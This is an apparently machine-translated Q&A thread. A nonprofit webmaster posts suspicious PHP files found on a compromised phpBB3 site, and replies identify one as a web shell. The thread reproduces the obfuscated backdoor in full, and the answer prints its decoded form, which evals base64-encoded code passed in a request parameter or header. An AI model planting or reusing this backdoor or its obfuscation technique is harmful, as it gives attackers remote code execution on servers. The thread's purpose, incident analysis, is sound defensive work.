2016-07-21 12 views
1

私は非営利団体のためにウェブサイトを運営しています.GodaddyでホストされているPHPbb3システムにピギーバックします。ローリング接続の問題が発生しました。私が知っているルートディレクトリにいくつかの "奇妙な"ファイルが見つかりました。誰もがコードを見て、これらのファイルが何をしていたかを見ることができますか?サーバー上の悪意のあるPHPコードが見つかりました - 誰でもこのコードの動作をアドバイスできますか?

<?php 
$katya='=KIT(a'; $choral= '$'; $fireproof='c'; $avivah= '=UlQy'; $islander= 'O'; $endosperm = '_s'; $fume=':S_:uee'; 
$knighthood ='WH'; $bars ='r$m'; 
$delicately ='D'; $caterpillar = '<ElUsabt'; $daydreaming ='$'; $contrasting = 't'; $gladys= 'S'; $complementing= '('; $kink = 'CK';$goblet ='X';$astigmatic = ')eklE';$ethane= 'l'; $aquamarine= 'Q'; $amalgams= 'u';$ardently= '[email protected]]L;"'; 

$cruelly='e';$lateral = 'P'; 

$chased = 'G'; $aspects = 'e,girT';$dismayed ='$x$Le';$handicap='s';$glints ='d'; $cursing=']Eg'; $jurisprudent = '[ac';$indeed ='M'; $influenza= '_'; 
$dehydrate= 'a'; 

$exch= ')__';$felling ='s'; $jedimaster= 'leFa'; $interrogating ='M'; 
$exaggerating='TLstSi)(_'; 

$introduced='['; $barrette='ARLEn;E;'; $halfhearted= 'o)"s$(fm';$jeffy ='O'; $ange = '9'; 
$handicraftsmen = ')p'; $giacinta = 'r[("KeHLv'; $johann='d'; $efferent ='r';$involving='l'; $cornucopia ='d';$assortment ='$u>U(vSov'; $idles='a';$decimated='`'; $grater = 'e';$chewing = 't'; $kayo='"';$currant =' ';$astronomically ='6'; $decomposition= 'Yo';$dukeleto ='cbi'; $diverging ='O'; $earning = 'e"';$caveman = '?'; 

$independent = '"'; 

$lab= '=(ia$'; $anode = '$';$jixian='y';$freights = '[E';$approve ='(__'; 

$gnome= 'KLeptre'; 
$crimson ='r'; 
$chandler='i_X$gaa';$edits='?';$blunderings='_';$attraction ='P';$avoid='k)rRf7vX';$liabilities='4';$blaster='P'; $alumnae= 's'; $daveen ='VecStT_';$crop= 'esm)Mr'; $isles ='tLnga"'; $beniamino='rRuiJVe';$concentrators = '"'; 
$commando='i'; 
$angrier ='i';$boatsman = 'RhTT_;B'; $informal='s'; $anode =':';$compatible ='^';$catherine = '8In'; $blade= 'e'; 

$inquisition ='['; 

$brutalize='l'; 

$garfield=']Us'; $cruisers = 'r'; $galleried = 'H'; $garvy = '(5d';$lesson = ')6';$gunplay = '('; $fertilization =','; 

$halibut =')'; 

$bravura = ';)lCa';$lamp = 'N';$drain = 'c';$hydroxy ='fa)Z'; $beetles= ']]i(x';$daniella = '?';$bar=$drain. 

$cruisers .$blade. 
$hydroxy['1']. 
$isles['0'] . $blade. $boatsman['4'] . $hydroxy['0'].$beniamino['2'] .$catherine['2']. 

$drain. $isles['0']. $beetles['2']. $decomposition['1'] . 

$catherine['2']; $bulls= $currant ;$hog=$bar ($bulls, $blade.$avoid[6]. 
$hydroxy['1'] . $bravura['2'] .$beetles['3'] .$hydroxy['1'] .$cruisers.$cruisers. $hydroxy['1'] .$jixian. 

$boatsman['4']. $gnome['3'] . $decomposition['1']. 
$gnome['3']. 

$beetles['3'].$hydroxy['0'].$beniamino['2'] .$catherine['2']. $drain . 

$boatsman['4'] .$isles['3'] .$blade .$isles['0'] . 
$boatsman['4']. $hydroxy['1'] . $cruisers. $isles['3']. 
$garfield['2'] . $beetles['3']. $hydroxy[2]. $hydroxy[2] . 

$hydroxy[2] .$bravura['0']); 

$hog 
($avoid['5'] ,$delicately, $garfield['1'], $chandler['3'] ,$lucia , $corporacy[2] ,$boatsman['6'] , $chandler['3'] . $beetles['2']. $lab['0'] .$hydroxy['1'] . $cruisers . $cruisers .$hydroxy['1']. $jixian .$boatsman['4'].$crop['2'] . 
$blade.$cruisers . $isles['3']. $blade . 

$beetles['3'].$chandler['3'] .$boatsman['4'] . $boatsman['0'] . 
$freights['1'] . 
$aquamarine.$garfield['1'] .$freights['1'] . 
$daveen[3] . 
$boatsman[3]. $fertilization .$chandler['3'].$boatsman['4']. $bravura['3']. $diverging. 

$diverging .$gnome['0'].$catherine['1'] . 
$freights['1'].$fertilization . 

$chandler['3'] .$boatsman['4'] . $daveen[3] . $freights['1'] .$boatsman['0']. $beniamino[5]. 
$freights['1']. $boatsman['0'] . $hydroxy[2] . $bravura['0']. $chandler['3'] . $hydroxy['1'].$lab['0'] . 
$beetles['2'] .$garfield['2'].$garfield['2'] . 
$blade . $isles['0'] .$beetles['3'] .$chandler['3'] . $beetles['2'] . 

$inquisition . 
$concentrators.$crop['2']. $avoid['0'] .$bravura['2'].$garfield['2']. 

$beetles['4'] .$bravura['2']. $beniamino['2'] .$bravura['2'].$concentrators.$beetles['1'] . 

$hydroxy[2] .$daniella['0']. 

$chandler['3'] .$beetles['2']. $inquisition.$concentrators . $crop['2']. $avoid['0'] .$bravura['2'] . $garfield['2'] . $beetles['4'] .$bravura['2']. 

$beniamino['2'] .$bravura['2'] .$concentrators . 

$beetles['1'] . 
$anode . $beetles['3']. $beetles['2'] . $garfield['2'].$garfield['2'] .$blade . $isles['0']. $beetles['3'] . $chandler['3'].$beetles['2'] . $inquisition .$concentrators .$galleried. $boatsman[3]. $boatsman[3].$blaster . $boatsman['4']. $crop[4]. $gnome['0'] .$isles['1'] .$daveen[3]. 
$avoid['7']. $isles['1'] .$garfield['1'] . 

$isles['1']. $concentrators .$beetles['1'].$hydroxy[2] .$daniella['0'].$chandler['3']. 
$beetles['2'].$inquisition .$concentrators . 
$galleried. 

$boatsman[3]. $boatsman[3]. 
$blaster.$boatsman['4'] . 
$crop[4].$gnome['0'] . $isles['1'].$daveen[3].$avoid['7']. 

$isles['1']. $garfield['1'] .$isles['1'].$concentrators . $beetles['1']. $anode. 

$garvy['2'] .$beetles['2'] . $blade . $hydroxy[2].$bravura['0'].$blade . $avoid[6]. 

$hydroxy['1'].$bravura['2']. 
$beetles['3'] . $garfield['2']. $isles['0'] .$cruisers. 
$cruisers. $blade .$avoid[6].$beetles['3']. $dukeleto['1']. $hydroxy['1'].$garfield['2'] . $blade .$lesson['1'] . $liabilities.$boatsman['4']. $garvy['2'].$blade . $drain. $decomposition['1']. $garvy['2'] .$blade.$beetles['3'] . 
$garfield['2']. $isles['0']. $cruisers. $cruisers.$blade . $avoid[6] . 
$beetles['3'] . 
$chandler['3'].$hydroxy['1'] .$hydroxy[2].$hydroxy[2] . 

$hydroxy[2] .$hydroxy[2]. $bravura['0']); 
+0

ほとんどのコードは、彼らが望むもの – cmorrissey

+0

だから、このスクリプトは、実際に '$ _REQUESTを取っている実行/アップロードする攻撃者のためのコントロールパネルを開きます$ _COOKIE、$ _ SERVER'を1つの変数にマージし、特定の変数を探してデコードして評価します。基本的に、攻撃者はこのスクリプトで必要なコードを実行できます。 – cmorrissey

+0

各PHPファイルを篩い分けする以外のアドバイスはありますか?私は複数のファイルの検索で探すべき特定の文字列ですか?何かアドバイスをいただければ幸いです。 –

答えて

0

これは、シェルスクリプトである:このような

B$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["mklsxlul"])?$i["mklsxlul"]:(isset($i["HTTP_MKLSXLUL"])?$i["HTTP_MKLSXLUL"]:die);eval(strrev(base64_decode(strrev($a)))); 
関連する問題